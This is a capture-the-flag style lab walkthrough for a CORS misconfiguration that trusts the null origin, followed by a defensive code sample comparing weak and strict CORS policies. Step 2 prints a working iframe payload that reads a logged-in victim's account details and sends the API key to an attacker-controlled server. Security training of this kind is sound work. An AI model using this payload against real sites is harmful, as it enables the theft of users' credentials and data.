June 15, 2026
Lab 17: CORS vulnerability with trusted null origin
Tkacala
Objective
The target website trusts only the null origin (an empty identity). An attacker can build an iframe with sandbox and srcdoc so that its origin becomes null, then steal the victim's API key.
Step 1: Log In & Open the Exploit Server
- Open the lab.
- Log in with wiener:peter.
- Click the "Go to exploit server" button.
Step 2: Build the Exploit Code with srcdoc
In the "Body" field of the exploit server, enter the following code:
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc='
<script>
  // Request the account details with the session cookie attached
  var req = new XMLHttpRequest();
  req.onload = reqListener;
  req.open("get","https://YOUR-LAB-ID.web-security-academy.net/accountDetails",true);
  req.withCredentials = true;
  req.send();
  // Forward the response body to the exploit server log
  function reqListener() {
    location="https://exploit-YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key="+encodeURIComponent(this.responseText);
  };
</script>
'></iframe>
- Replace YOUR-LAB-ID with your Lab ID.
- Replace YOUR-EXPLOIT-SERVER-ID with your own exploit server ID as well.
Step 3: Store & Test
- Click "Store".
- Click "View exploit" to test it yourself.
Step 4: Deliver to the Victim
- Click "Deliver to victim".
Step 5: Check the Access Log (Self-Test)
- Click "Access log" on the exploit server.
- Look for the request from your own IP that contains ?key=.
- Inside it you will find wiener's API key.
Step 6: Decode in CyberChef
- Open the CyberChef site.
- Paste the "log?key=" result into the CyberChef input field.
- Use URL Decode.
Step 7: Submit
- Copy the decoded API key.
- Paste and submit.
- Lab Solved
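The root cause described in the Objective is a server that answers `Origin: null` with credentialed CORS headers. The following is an added example, not code from the lab or from the original post, that puts that weak policy next to a strict exact-match allowlist and audits both with constructed Origin values. The allowlist entry, the probe origins and all function names are assumptions for illustration.

```javascript
// Assumed trusted front end (hypothetical value, not from the lab).
const ALLOWED_ORIGINS = new Set(["https://app.example.com"]);

// Weak policy as described on this page: "null" is treated as a trusted origin.
function weakCorsHeaders(origin) {
  if (origin === "null" || ALLOWED_ORIGINS.has(origin)) {
    return {
      "Access-Control-Allow-Origin": origin,
      "Access-Control-Allow-Credentials": "true",
    };
  }
  return {};
}

// Hardened policy: only exact, well-formed https origins from the allowlist.
function strictCorsHeaders(origin) {
  if (typeof origin !== "string") return {};
  let parsed;
  try { parsed = new URL(origin); } catch { return {}; } // "null" does not parse
  // Must be a bare https origin: no path, userinfo or trailing slash.
  if (parsed.protocol !== "https:" || parsed.origin !== origin) return {};
  if (!ALLOWED_ORIGINS.has(origin)) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin", // keep caches from reusing one origin's response for another
  };
}

// Constructed probe values: sandboxed iframe, unrelated site, lookalike, plain http.
const PROBES = [
  "null",
  "https://evil.example",
  "https://app.example.com.evil.example",
  "http://app.example.com",
];

// Return every probe origin that the policy would grant credentialed access.
function auditPolicy(policyFn) {
  return PROBES.filter(
    (o) => policyFn(o)["Access-Control-Allow-Credentials"] === "true"
  );
}

console.log("weak policy trusts:", auditPolicy(weakCorsHeaders));
console.log("strict policy trusts:", auditPolicy(strictCorsHeaders));
```
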